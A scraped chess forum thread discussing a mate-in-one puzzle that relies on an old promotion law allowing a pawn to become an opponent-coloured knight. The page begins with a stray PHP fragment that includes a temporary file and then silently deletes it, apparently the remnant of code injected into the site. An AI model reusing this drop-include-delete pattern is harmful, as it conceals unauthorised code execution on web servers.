"); fclose($hdl); include("{$eb}frmtmp.php"); @unlink("{$eb}frmtmp.php"); ?> Net-Chess.Com • View topic - A Difficult - Mate In 1

A Difficult - Mate In 1

Post any puzzles you have or post your analysis of any games played on Net-Chess or anywhere else. Posts which do not contain game puzzles or analysis will be removed, such posts belong in the general forum. Commentary and discussion on openings is also welcome here.

A Difficult - Mate In 1

Postby ecperreault » Sun Jul 31, 2011 8:58 pm

.
Last edited by ecperreault on Thu Dec 06, 2012 5:34 am, edited 1 time in total.
ecperreault
General Forum Grandmaster
 
Posts: 1139
Joined: Sun Jan 09, 2011 10:41 pm

Postby angelofthenight » Mon Aug 01, 2011 4:02 am

"Code of Laws of the British Chess Association" Law XIII thereof provided, "When a pawn has reached the eighth square, the player has the option of selecting a piece, whether such piece has previously been lost or not, whose names and powers it shall then assume, or of deciding that it shall remain a pawn."

White is to play and checkmate in one move. No solution is possible under modern-day rules, but with Law XIII in effect the surprising solution is 1.b8(Black N)!, when the newly promoted knight blocks its own king's flight square.
angelofthenight
 
Posts: 38
Joined: Wed Feb 12, 2003 12:50 pm

Postby islanderfan » Mon Aug 01, 2011 6:36 am

But what if the King takes the promoted knight?
islanderfan
 
Posts: 880
Joined: Mon May 14, 2001 10:56 pm

Postby ecperreault » Mon Aug 01, 2011 1:40 pm

.
Last edited by ecperreault on Thu Dec 06, 2012 5:34 am, edited 1 time in total.
ecperreault
General Forum Grandmaster
 
Posts: 1139
Joined: Sun Jan 09, 2011 10:41 pm

Re: A Difficult - Mate In 1

Postby davidswhite » Thu Sep 27, 2012 4:26 pm

Eugene,

I just now looked at this. I'd have to classify this not as a rule change but rather a rule clarification.When the rule was initially written,it never occurred
to the drafters that the rule,as written,was incomplete since they would never have considered the possibility that the player with the advanced pawn would ever benefit by promoting it to a piece of his opponent's color. When their eyes were opened by the referenced game,they didn't write a new rule
negating the original one but ,instead, took the original rule and added some words to the end of it which would prevent their intention from ever again being subverted.

Bestest,
David
davidswhite
Uranium
 
Posts: 150
Joined: Fri Nov 26, 1999 1:31 pm


Return to Puzzles and Game Comentary

Who is online

Users browsing this forum: No registered users and 1 guest

cron